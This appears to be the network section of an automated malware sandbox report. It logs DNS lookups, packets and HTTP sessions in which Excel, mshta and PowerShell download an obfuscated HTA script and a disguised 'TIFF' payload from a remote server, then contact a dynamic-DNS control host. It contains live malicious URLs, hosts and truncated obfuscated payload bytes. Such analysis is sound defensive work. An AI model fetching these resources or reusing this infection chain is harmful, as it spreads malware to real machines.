Dec 3, 2024 14:01:55.408694983 CET  80           49181      142.93.65.161    192.168.2.22
Dec 3, 2024 14:01:55.408850908 CET  80           49181      142.93.65.161    192.168.2.22
Dec 3, 2024 14:01:55.408888102 CET  49181        80         192.168.2.22     142.93.65.161
Dec 3, 2024 14:01:55.409801960 CET  80           49181      142.93.65.161    192.168.2.22
Dec 3, 2024 14:01:55.409917116 CET  80           49181      142.93.65.161    192.168.2.22
Dec 3, 2024 14:01:55.409960032 CET  49181        80         192.168.2.22     142.93.65.161
Dec 3, 2024 14:01:55.410919905 CET  80           49181      142.93.65.161    192.168.2.22
Dec 3, 2024 14:01:55.411029100 CET  80           49181      142.93.65.161    192.168.2.22
Dec 3, 2024 14:01:55.411082983 CET  49181        80         192.168.2.22     142.93.65.161
Dec 3, 2024 14:01:55.412031889 CET  80           49181      142.93.65.161    192.168.2.22
Dec 3, 2024 14:01:55.412131071 CET  80           49181      142.93.65.161    192.168.2.22
Dec 3, 2024 14:01:55.412179947 CET  49181        80         192.168.2.22     142.93.65.161
Dec 3, 2024 14:01:55.413173914 CET  80           49181      142.93.65.161    192.168.2.22
Dec 3, 2024 14:01:55.413252115 CET  80           49181      142.93.65.161    192.168.2.22
Dec 3, 2024 14:01:55.413300991 CET  49181        80         192.168.2.22     142.93.65.161
Dec 3, 2024 14:01:55.414277077 CET  80           49181      142.93.65.161    192.168.2.22
Dec 3, 2024 14:01:55.414427996 CET  80           49181      142.93.65.161    192.168.2.22
Dec 3, 2024 14:01:55.414475918 CET  49181        80         192.168.2.22     142.93.65.161
Dec 3, 2024 14:01:55.415340900 CET  80           49181      142.93.65.161    192.168.2.22
Dec 3, 2024 14:01:55.415492058 CET  80           49181      142.93.65.161    192.168.2.22
Dec 3, 2024 14:01:55.415546894 CET  49181        80         192.168.2.22     142.93.65.161
Dec 3, 2024 14:01:55.416433096 CET  80           49181      142.93.65.161    192.168.2.22
Dec 3, 2024 14:01:55.416527987 CET  80           49181      142.93.65.161    192.168.2.22
Dec 3, 2024 14:01:55.416575909 CET  49181        80         192.168.2.22     142.93.65.161
Dec 3, 2024 14:01:55.417633057 CET  80           49181      142.93.65.161    192.168.2.22
Dec 3, 2024 14:01:55.417702913 CET  80           49181      142.93.65.161    192.168.2.22
Dec 3, 2024 14:01:55.417749882 CET  49181        80         192.168.2.22     142.93.65.161
Dec 3, 2024 14:01:55.418759108 CET  80           49181      142.93.65.161    192.168.2.22
Dec 3, 2024 14:01:55.418771982 CET  80           49181      142.93.65.161    192.168.2.22
Dec 3, 2024 14:01:55.418806076 CET  49181        80         192.168.2.22     142.93.65.161
Dec 3, 2024 14:01:55.419888020 CET  80           49181      142.93.65.161    192.168.2.22
Dec 3, 2024 14:01:55.420006990 CET  80           49181      142.93.65.161    192.168.2.22
Dec 3, 2024 14:01:55.420088053 CET  49181        80         192.168.2.22     142.93.65.161
Dec 3, 2024 14:01:55.420878887 CET  80           49181      142.93.65.161    192.168.2.22
Dec 3, 2024 14:01:55.420954943 CET  80           49181      142.93.65.161    192.168.2.22
Dec 3, 2024 14:01:55.421001911 CET  49181        80         192.168.2.22     142.93.65.161
Dec 3, 2024 14:01:55.421921015 CET  80           49181      142.93.65.161    192.168.2.22
Dec 3, 2024 14:01:55.422068119 CET  80           49181      142.93.65.161    192.168.2.22
Dec 3, 2024 14:01:55.422106028 CET  49181        80         192.168.2.22     142.93.65.161
Dec 3, 2024 14:01:55.423105001 CET  80           49181      142.93.65.161    192.168.2.22
Dec 3, 2024 14:01:55.423208952 CET  80           49181      142.93.65.161    192.168.2.22
Dec 3, 2024 14:01:55.423249006 CET  49181        80         192.168.2.22     142.93.65.161
Dec 3, 2024 14:01:55.424189091 CET  80           49181      142.93.65.161    192.168.2.22
Dec 3, 2024 14:01:55.424305916 CET  80           49181      142.93.65.161    192.168.2.22
Dec 3, 2024 14:01:55.424351931 CET  49181        80         192.168.2.22     142.93.65.161
Dec 3, 2024 14:01:55.425328016 CET  80           49181      142.93.65.161    192.168.2.22
Dec 3, 2024 14:01:55.425458908 CET  80           49181      142.93.65.161    192.168.2.22
Dec 3, 2024 14:01:55.425498009 CET  49181        80         192.168.2.22     142.93.65.161
Dec 3, 2024 14:01:55.426393032 CET  80           49181      142.93.65.161    192.168.2.22
Dec 3, 2024 14:01:55.426450014 CET  80           49181      142.93.65.161    192.168.2.22
Dec 3, 2024 14:01:55.426490068 CET  49181        80         192.168.2.22     142.93.65.161
Dec 3, 2024 14:01:55.427428961 CET  80           49181      142.93.65.161    192.168.2.22
Dec 3, 2024 14:01:55.427637100 CET  80           49181      142.93.65.161    192.168.2.22
Dec 3, 2024 14:01:55.427680016 CET  49181        80         192.168.2.22     142.93.65.161
Dec 3, 2024 14:01:55.428647041 CET  80           49181      142.93.65.161    192.168.2.22
Dec 3, 2024 14:01:55.428787947 CET  80           49181      142.93.65.161    192.168.2.22
Dec 3, 2024 14:01:55.428828001 CET  49181        80         192.168.2.22     142.93.65.161
Dec 3, 2024 14:01:55.429722071 CET  80           49181      142.93.65.161    192.168.2.22
Dec 3, 2024 14:01:55.429790974 CET  80           49181      142.93.65.161    192.168.2.22
Dec 3, 2024 14:01:55.429831982 CET  49181        80         192.168.2.22     142.93.65.161
Dec 3, 2024 14:01:55.430771112 CET  80           49181      142.93.65.161    192.168.2.22
Dec 3, 2024 14:01:55.430880070 CET  80           49181      142.93.65.161    192.168.2.22
Dec 3, 2024 14:01:55.430923939 CET  49181        80         192.168.2.22     142.93.65.161
Dec 3, 2024 14:01:55.431983948 CET  80           49181      142.93.65.161    192.168.2.22
Dec 3, 2024 14:01:55.431997061 CET  80           49181      142.93.65.161    192.168.2.22
Dec 3, 2024 14:01:55.432044029 CET  49181        80         192.168.2.22     142.93.65.161
Dec 3, 2024 14:01:55.432966948 CET  80           49181      142.93.65.161    192.168.2.22
Dec 3, 2024 14:01:55.433053970 CET  80           49181      142.93.65.161    192.168.2.22
Dec 3, 2024 14:01:55.433099985 CET  49181        80         192.168.2.22     142.93.65.161
Dec 3, 2024 14:01:55.434032917 CET  80           49181      142.93.65.161    192.168.2.22
Dec 3, 2024 14:01:55.434170008 CET  80           49181      142.93.65.161    192.168.2.22
Dec 3, 2024 14:01:55.434216976 CET  49181        80         192.168.2.22     142.93.65.161
Dec 3, 2024 14:01:55.435173988 CET  80           49181      142.93.65.161    192.168.2.22
Dec 3, 2024 14:01:55.435311079 CET  80           49181      142.93.65.161    192.168.2.22
Dec 3, 2024 14:01:55.435370922 CET  49181        80         192.168.2.22     142.93.65.161
Dec 3, 2024 14:01:55.436218023 CET  80           49181      142.93.65.161    192.168.2.22
Dec 3, 2024 14:01:55.650738001 CET  49181        80         192.168.2.22     142.93.65.161
Dec 3, 2024 14:01:55.698709011 CET  49181        80         192.168.2.22     142.93.65.161
Dec 3, 2024 14:02:10.262788057 CET  4044         49178      31.13.224.72     192.168.2.22
Dec 3, 2024 14:02:10.265464067 CET  49178        4044       192.168.2.22     31.13.224.72
Dec 3, 2024 14:02:10.385512114 CET  4044         49178      31.13.224.72     192.168.2.22
Dec 3, 2024 14:02:40.441361904 CET  4044         49178      31.13.224.72     192.168.2.22
Dec 3, 2024 14:02:40.442831993 CET  49178        4044       192.168.2.22     31.13.224.72
Dec 3, 2024 14:02:40.562999010 CET  4044         49178      31.13.224.72     192.168.2.22
Dec 3, 2024 14:02:51.222239971 CET  49180        80         192.168.2.22     178.237.33.50
Dec 3, 2024 14:02:51.576814890 CET  49180        80         192.168.2.22     178.237.33.50
Dec 3, 2024 14:02:52.278812885 CET  49180        80         192.168.2.22     178.237.33.50
Dec 3, 2024 14:02:53.682799101 CET  49180        80         192.168.2.22     178.237.33.50
Dec 3, 2024 14:02:56.381652117 CET  49180        80         192.168.2.22     178.237.33.50
Dec 3, 2024 14:03:01.685602903 CET  49180        80         192.168.2.22     178.237.33.50
Dec 3, 2024 14:03:10.920756102 CET  4044         49178      31.13.224.72     192.168.2.22
Dec 3, 2024 14:03:10.937508106 CET  49178        4044       192.168.2.22     31.13.224.72
Dec 3, 2024 14:03:11.058032036 CET  4044         49178      31.13.224.72     192.168.2.22
Dec 3, 2024 14:03:12.278034925 CET  49180        80         192.168.2.22     178.237.33.50
Timestamp                           Source Port  Dest Port  Source IP        Dest IP
Dec 3, 2024 14:00:52.957813978 CET  54562        53         192.168.2.22     8.8.8.8
Dec 3, 2024 14:00:53.301515102 CET  53           54562      8.8.8.8          192.168.2.22
Dec 3, 2024 14:00:57.431154966 CET  52917        53         192.168.2.22     8.8.8.8
Dec 3, 2024 14:00:57.843759060 CET  53           52917      8.8.8.8          192.168.2.22
Dec 3, 2024 14:00:57.862140894 CET  52917        53         192.168.2.22     8.8.8.8
Dec 3, 2024 14:00:57.997905016 CET  53           52917      8.8.8.8          192.168.2.22
Dec 3, 2024 14:01:18.486355066 CET  62751        53         192.168.2.22     8.8.8.8
Dec 3, 2024 14:01:18.522454977 CET  57893        53         192.168.2.22     8.8.8.8
Dec 3, 2024 14:01:18.661891937 CET  54821        53         192.168.2.22     8.8.8.8
Dec 3, 2024 14:01:18.795052052 CET  53           57893      8.8.8.8          192.168.2.22
Dec 3, 2024 14:01:18.795325994 CET  57893        53         192.168.2.22     8.8.8.8
Dec 3, 2024 14:01:19.167767048 CET  53           57893      8.8.8.8          192.168.2.22
Dec 3, 2024 14:01:19.168683052 CET  57893        53         192.168.2.22     8.8.8.8
Dec 3, 2024 14:01:19.303076982 CET  53           57893      8.8.8.8          192.168.2.22
Dec 3, 2024 14:01:32.610449076 CET  54719        53         192.168.2.22     8.8.8.8
Dec 3, 2024 14:01:32.831568956 CET  53           54719      8.8.8.8          192.168.2.22
Dec 3, 2024 14:01:32.857302904 CET  49881        53         192.168.2.22     8.8.8.8
Dec 3, 2024 14:01:41.472800016 CET  54998        53         192.168.2.22     8.8.8.8
Dec 3, 2024 14:01:41.809935093 CET  53           54998      8.8.8.8          192.168.2.22
Dec 3, 2024 14:01:44.513333082 CET  52781        53         192.168.2.22     8.8.8.8
Dec 3, 2024 14:01:44.753160954 CET  53           52781      8.8.8.8          192.168.2.22
Dec 3, 2024 14:01:44.753546000 CET  52781        53         192.168.2.22     8.8.8.8
Dec 3, 2024 14:01:44.993408918 CET  53           52781      8.8.8.8          192.168.2.22
Timestamp                           Source IP        Dest IP    Trans ID  OP Code             Name                       Type            Class        DNS over HTTPS
Dec 3, 2024 14:00:52.957813978 CET  192.168.2.22     8.8.8.8    0x802     Standard query (0)  short.ruksk.com            A (IP address)  IN (0x0001)  false
Dec 3, 2024 14:00:57.431154966 CET  192.168.2.22     8.8.8.8    0xec76    Standard query (0)  short.ruksk.com            A (IP address)  IN (0x0001)  false
Dec 3, 2024 14:00:57.862140894 CET  192.168.2.22     8.8.8.8    0xec76    Standard query (0)  short.ruksk.com            A (IP address)  IN (0x0001)  false
Dec 3, 2024 14:01:18.486355066 CET  192.168.2.22     8.8.8.8    0xb137    Standard query (0)  res.cloudinary.com         A (IP address)  IN (0x0001)  false
Dec 3, 2024 14:01:18.522454977 CET  192.168.2.22     8.8.8.8    0x4aff    Standard query (0)  short.ruksk.com            A (IP address)  IN (0x0001)  false
Dec 3, 2024 14:01:18.661891937 CET  192.168.2.22     8.8.8.8    0xf578    Standard query (0)  res.cloudinary.com         A (IP address)  IN (0x0001)  false
Dec 3, 2024 14:01:18.795325994 CET  192.168.2.22     8.8.8.8    0x4aff    Standard query (0)  short.ruksk.com            A (IP address)  IN (0x0001)  false
Dec 3, 2024 14:01:19.168683052 CET  192.168.2.22     8.8.8.8    0x4aff    Standard query (0)  short.ruksk.com            A (IP address)  IN (0x0001)  false
Dec 3, 2024 14:01:32.610449076 CET  192.168.2.22     8.8.8.8    0x37b3    Standard query (0)  res.cloudinary.com         A (IP address)  IN (0x0001)  false
Dec 3, 2024 14:01:32.857302904 CET  192.168.2.22     8.8.8.8    0x849     Standard query (0)  res.cloudinary.com         A (IP address)  IN (0x0001)  false
Dec 3, 2024 14:01:41.472800016 CET  192.168.2.22     8.8.8.8    0x43ed    Standard query (0)  apamanollonan.duckdns.org  A (IP address)  IN (0x0001)  false
Dec 3, 2024 14:01:44.513333082 CET  192.168.2.22     8.8.8.8    0x5e5f    Standard query (0)  geoplugin.net              A (IP address)  IN (0x0001)  false
Dec 3, 2024 14:01:44.753546000 CET  192.168.2.22     8.8.8.8    0x5e5f    Standard query (0)  geoplugin.net              A (IP address)  IN (0x0001)  false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Dec 3, 2024 14:00:53.301515102 CET | 8.8.8.8 | 192.168.2.22 | 0x802 | No error (0) | short.ruksk.com | | 54.150.207.131 | A (IP address) | IN (0x0001) | false
Dec 3, 2024 14:00:57.843759060 CET | 8.8.8.8 | 192.168.2.22 | 0xec76 | No error (0) | short.ruksk.com | | 54.150.207.131 | A (IP address) | IN (0x0001) | false
Dec 3, 2024 14:00:57.997905016 CET | 8.8.8.8 | 192.168.2.22 | 0xec76 | No error (0) | short.ruksk.com | | 54.150.207.131 | A (IP address) | IN (0x0001) | false
Dec 3, 2024 14:01:18.648015022 CET | 8.8.8.8 | 192.168.2.22 | 0xb137 | No error (0) | res.cloudinary.com | ion.cloudinary.com.edgekey.net | | CNAME (Canonical name) | IN (0x0001) | false
Dec 3, 2024 14:01:18.795052052 CET | 8.8.8.8 | 192.168.2.22 | 0x4aff | No error (0) | short.ruksk.com | | 54.150.207.131 | A (IP address) | IN (0x0001) | false
Dec 3, 2024 14:01:18.821018934 CET | 8.8.8.8 | 192.168.2.22 | 0xf578 | No error (0) | res.cloudinary.com | ion.cloudinary.com.edgekey.net | | CNAME (Canonical name) | IN (0x0001) | false
Dec 3, 2024 14:01:19.167767048 CET | 8.8.8.8 | 192.168.2.22 | 0x4aff | No error (0) | short.ruksk.com | | 54.150.207.131 | A (IP address) | IN (0x0001) | false
Dec 3, 2024 14:01:19.303076982 CET | 8.8.8.8 | 192.168.2.22 | 0x4aff | No error (0) | short.ruksk.com | | 54.150.207.131 | A (IP address) | IN (0x0001) | false
Dec 3, 2024 14:01:32.831568956 CET | 8.8.8.8 | 192.168.2.22 | 0x37b3 | No error (0) | res.cloudinary.com | cloudinary.map.fastly.net | | CNAME (Canonical name) | IN (0x0001) | false
Dec 3, 2024 14:01:32.831568956 CET | 8.8.8.8 | 192.168.2.22 | 0x37b3 | No error (0) | cloudinary.map.fastly.net | | 151.101.65.137 | A (IP address) | IN (0x0001) | false
Dec 3, 2024 14:01:32.831568956 CET | 8.8.8.8 | 192.168.2.22 | 0x37b3 | No error (0) | cloudinary.map.fastly.net | | 151.101.129.137 | A (IP address) | IN (0x0001) | false
Dec 3, 2024 14:01:32.831568956 CET | 8.8.8.8 | 192.168.2.22 | 0x37b3 | No error (0) | cloudinary.map.fastly.net | | 151.101.193.137 | A (IP address) | IN (0x0001) | false
Dec 3, 2024 14:01:32.831568956 CET | 8.8.8.8 | 192.168.2.22 | 0x37b3 | No error (0) | cloudinary.map.fastly.net | | 151.101.1.137 | A (IP address) | IN (0x0001) | false
Dec 3, 2024 14:01:33.115714073 CET | 8.8.8.8 | 192.168.2.22 | 0x849 | No error (0) | res.cloudinary.com | resc.cloudinary.com.cdn.cloudflare.net | | CNAME (Canonical name) | IN (0x0001) | false
Dec 3, 2024 14:01:41.809935093 CET | 8.8.8.8 | 192.168.2.22 | 0x43ed | No error (0) | apamanollonan.duckdns.org | | 31.13.224.72 | A (IP address) | IN (0x0001) | false
Dec 3, 2024 14:01:44.753160954 CET | 8.8.8.8 | 192.168.2.22 | 0x5e5f | No error (0) | geoplugin.net | | 178.237.33.50 | A (IP address) | IN (0x0001) | false
Dec 3, 2024 14:01:44.993408918 CET | 8.8.8.8 | 192.168.2.22 | 0x5e5f | No error (0) | geoplugin.net | | 178.237.33.50 | A (IP address) | IN (0x0001) | false
• short.ruksk.com
• res.cloudinary.com
• 142.93.65.161
• geoplugin.net

Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.22 | 49166 | 142.93.65.161 | 80 | 3312 | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Timestamp | Bytes transferred | Direction | Data
Dec 3, 2024 14:00:55.853151083 CET | 381 | OUT | GET /xampp/ws/niceworkingpersonwithhergirlfriendsheisbeautiful.hta HTTP/1.1
Accept: */*
UA-CPU: AMD64
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: 142.93.65.161
Connection: Keep-Alive
Dec 3, 2024 14:00:57.033308983 CET | 1236 | IN | HTTP/1.1 200 OK
Date: Tue, 03 Dec 2024 13:00:56 GMT
Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
Last-Modified: Tue, 03 Dec 2024 05:33:52 GMT
ETag: "26ff2-6285702adf515"
Accept-Ranges: bytes
Content-Length: 159730
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: application/hta


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.22 | 49168 | 142.93.65.161 | 80 | 3588 | C:\Windows\System32\mshta.exe

Timestamp | Bytes transferred | Direction | Data
Dec 3, 2024 14:01:00.479321003 CET | 458 | OUT | GET /xampp/ws/niceworkingpersonwithhergirlfriendsheisbeautiful.hta HTTP/1.1
Accept: */*
Accept-Language: fr-FR
UA-CPU: AMD64
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Range: bytes=8896-
Connection: Keep-Alive
Host: 142.93.65.161
If-Range: "26ff2-6285702adf515"
Dec 3, 2024 14:01:01.566916943 CET | 1236 | IN | HTTP/1.1 206 Partial Content
Date: Tue, 03 Dec 2024 13:01:01 GMT
Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
Last-Modified: Tue, 03 Dec 2024 05:33:52 GMT
ETag: "26ff2-6285702adf515"
Accept-Ranges: bytes
Content-Length: 150834
Content-Range: bytes 8896-159729/159730
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: application/hta
                                                                                                                                                                                  Dec 3, 2024 14:01:01.568005085 CET1236INData Raw: 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32
                                                                                                                                                                                  Data Ascii: 520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%2
                                                                                                                                                                                  Dec 3, 2024 14:01:01.568017006 CET1236INData Raw: 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32
                                                                                                                                                                                  Data Ascii: 252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%25252
                                                                                                                                                                                  Dec 3, 2024 14:01:01.568036079 CET1236INData Raw: 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35
                                                                                                                                                                                  Data Ascii: 20%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%25
                                                                                                                                                                                  Dec 3, 2024 14:01:01.568681002 CET1236INData Raw: 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30
                                                                                                                                                                                  Data Ascii: 52520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520
                                                                                                                                                                                  Dec 3, 2024 14:01:01.568696022 CET1236INData Raw: 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32
                                                                                                                                                                                  Data Ascii: 0%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252
                                                                                                                                                                                  Dec 3, 2024 14:01:01.568713903 CET1236INData Raw: 32 35 36 36 25 32 35 32 35 35 34 25 32 35 32 35 34 44 25 32 35 32 35 36 31 25 32 35 32 35 36 45 25 32 35 32 35 37 32 25 32 35 32 35 34 41 25 32 35 32 35 37 34 25 32 35 32 35 35 33 25 32 35 32 35 34 41 25 32 35 32 35 34 37 25 32 35 32 35 35 36 25
                                                                                                                                                                                  Data Ascii: 2566%252554%25254D%252561%25256E%252572%25254A%252574%252553%25254A%252547%252556%252541%25256D%252546%25256E%25254E%252550%252573%252567%252569%252558%252564%252547%25254F%252550%252544%25256D%252557%252550%252543%252547%252562%252555%25256B%
                                                                                                                                                                                  Dec 3, 2024 14:01:01.687355042 CET1236INData Raw: 25 32 35 32 35 35 39 25 32 35 32 35 36 36 25 32 35 32 35 35 39 25 32 35 32 35 36 43 25 32 35 32 35 35 36 25 32 35 32 35 34 44 25 32 35 32 35 35 36 25 32 35 32 35 36 36 25 32 35 32 35 37 33 25 32 35 32 35 36 43 25 32 35 32 35 32 30 25 32 35 32 35
                                                                                                                                                                                  Data Ascii: %252559%252566%252559%25256C%252556%25254D%252556%252566%252573%25256C%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%2525


Session ID  Source IP     Source Port  Destination IP  Destination Port  PID   Process
2           192.168.2.22  49169        142.93.65.161   80                3720  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp | Bytes transferred | Direction | Data
Dec 3, 2024 14:01:10.399780035 CET | 373 | OUT | GET /680/weneedkissingwellongirlfriendshebeautifulgirl.tIF HTTP/1.1
Accept: */*
UA-CPU: AMD64
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: 142.93.65.161
Connection: Keep-Alive
Dec 3, 2024 14:01:11.531014919 CET | 1236 | IN | HTTP/1.1 200 OK
Date: Tue, 03 Dec 2024 13:01:11 GMT
Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
Last-Modified: Tue, 03 Dec 2024 05:30:51 GMT
ETag: "25970-62856f7e236fd"
Accept-Ranges: bytes
Content-Length: 153968
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: image/tiff
Data Raw: ff fe 0d 00 0a 00 20 00 20 00 20 00 20 00 0d 00 0a 00 63 00 62 00 75 00 73 00 6a 00 4f 00 4c 00 5a 00 63 00 6d 00 57 00 4a 00 47 00 61 00 66 00 20 00 3d 00 20 00 22 00 69 00 4c 00 5a 00 4c 00 55 00 68 00 6e 00 55 00 6b 00 55 00 4c 00 55 00 4c 00 57 00 6f 00 22 00 0d 00 0a 00 6f 00 69 00 74 00 4b 00 55 00 57 00 69 00 49 00 47 00 4c 00 4b 00 69 00 53 00 4b 00 61 00 20 00 3d 00 20 00 22 00 4b 00 69 00 4c 00 64 00 4e 00 4c 00 6d 00 63 00 4b 00 4c 00 6a 00 4c 00 61 00 71 00 41 00 22 00 0d 00 0a 00 68 00 64 00 61 00 4c 00 4f 00 4c 00 4c 00 41 00 61 00 4c 00 50 00 70 00 6b 00 4c 00 69 00 20 00 3d 00 20 00 22 00 57 00 6f 00 4b 00 69 00 78 00 4b 00 4c 00 5a 00 75 00 6d 00 74 00 41 00 64 00 7a 00 62 00 22 00 0d 00 0a 00 0d 00 0a 00 63 00 4c 00 63 00 50 00 47 00 50 00 4c 00 42 00 42 00 4c 00 4c 00 57 00 7a 00 70 00 42 00 20 00 3d 00 20 00 22 00 74 00 67 00 75 00 62 00 57 00 4b 00 74 00 41 00 7a 00 68 00 6e 00 52 00 6c 00 70 00 76 00 22 00 0d 00 0a 00 74 00 66 00 4f 00 68 00 6c 00 5a 00 63 00 69 00 42 00 7a 00 [TRUNCATED]
Data Ascii: cbusjOLZcmWJGaf = "iLZLUhnUkULULWo"oitKUWiIGLKiSKa = "KiLdNLmcKLjLaqA"hdaLOLLAaLPpkLi = "WoKixKLZumtAdzb"cLcPGPLBBLLWzpB = "tgubWKtAzhnRlpv"tfOhlZciBznnZlG = "xiefWspLeLGLGon"ZKKzONeUiePIOkr = "HknpquWLGiTLtod"BdkdOKZAvPKzNuU = "qLRGPluGPkLfWco"KLxWLksfGtGlUlf = "LfAubNLWBNoLLmZ"WtiAULKWQxhWczq = "vIkJLAWxZzKcfui"piBeKOxGmUUiWBv = "UmpZccLqWLrKLaK"xHLNfunWGboHlWi = "AWQCNLBmZfWNHxj"vqBGlmuHhKgaLJL = "xgkSPReOUhLoUeK"abUzLL
Dec 3, 2024 14:01:11.531101942 CET | 1236 | IN | Data Raw: 00 5a 00 69 00 76 00 69 00 64 00 57 00 57 00 47 00 6f 00 20 00 3d 00 20 00 22 00 43 00 6a 00 53 00 41 00 7a 00 47 00 4c 00 43 00 63 00 70 00 52 00 47 00 4c 00 4c 00 57 00 22 00 0d 00 0a 00 63 00 4b 00 47 00 43 00 52 00 4c 00 69 00 49 00 4c 00 69
Data Ascii: ZividWWGo = "CjSAzGLCcpRGLLW"cKGCRLiILiuHfkz = "xrsNtfLzfkeLmOK"sZJLKAUGOeOPmbL = "GPKUiLGBTiOotLd"LafCpklxuLcfpk
Dec 3, 2024 14:01:11.531115055 CET | 1236 | IN | Data Raw: 00 73 00 57 00 6c 00 68 00 57 00 68 00 22 00 0d 00 0a 00 57 00 6d 00 75 00 7a 00 52 00 57 00 57 00 43 00 5a 00 6b 00 6d 00 69 00 6d 00 42 00 70 00 20 00 3d 00 20 00 22 00 4f 00 48 00 75 00 6f 00 70 00 55 00 47 00 4f 00 55 00 69 00 6f 00 73 00 66
Data Ascii: sWlhWh"WmuzRWWCZkmimBp = "OHuopUGOUiosfcl"NWcKeGBLNgpnKmv = "LWWqLecGoeicbbq"KpaWdUKKpUkCaLb = "QGWfpJcULbKcovi"k
Dec 3, 2024 14:01:11.531495094 CET | 1236 | IN | Data Raw: 00 57 00 65 00 20 00 3d 00 20 00 22 00 7a 00 48 00 6e 00 4c 00 47 00 63 00 72 00 57 00 72 00 47 00 66 00 4f 00 68 00 57 00 70 00 22 00 0d 00 0a 00 76 00 50 00 4c 00 57 00 57 00 63 00 57 00 4f 00 57 00 76 00 4c 00 4c 00 6f 00 6f 00 57 00 20 00 3d
Data Ascii: We = "zHnLGcrWrGfOhWp"vPLWWcWOWvLLooW = "WofviLihnGlNKcm"JLOqZntSTlKtLpz = "nWUbkbpxozkgLGW"cZUHWceKtmckOfH = "AiWW
Dec 3, 2024 14:01:11.531506062 CET | 1236 | IN | Data Raw: 00 57 00 4b 00 42 00 63 00 6b 00 4c 00 4c 00 4c 00 65 00 4b 00 4c 00 55 00 47 00 4c 00 64 00 20 00 3d 00 20 00 22 00 78 00 4b 00 64 00 4b 00 4c 00 43 00 4c 00 6c 00 78 00 5a 00 42 00 69 00 6e 00 6c 00 63 00 22 00 0d 00 0a 00 4f 00 62 00 4b 00 50
Data Ascii: WKBckLLLeKLUGLd = "xKdKLCLlxZBinlc"ObKPsbLkajqLWoB = "uWnbOOGlLUKZUhx"LnAPgbOcfmhzlGv = "LzqWkLitWWhqmLx"isAGRtAZ
Dec 3, 2024 14:01:11.531517029 CET | 1236 | IN | Data Raw: 00 6c 00 4f 00 4c 00 76 00 5a 00 78 00 57 00 54 00 4c 00 48 00 4b 00 50 00 22 00 0d 00 0a 00 66 00 42 00 73 00 43 00 5a 00 62 00 63 00 67 00 41 00 63 00 53 00 4c 00 4a 00 6b 00 55 00 20 00 3d 00 20 00 22 00 61 00 4b 00 50 00 78 00 42 00 65 00 72
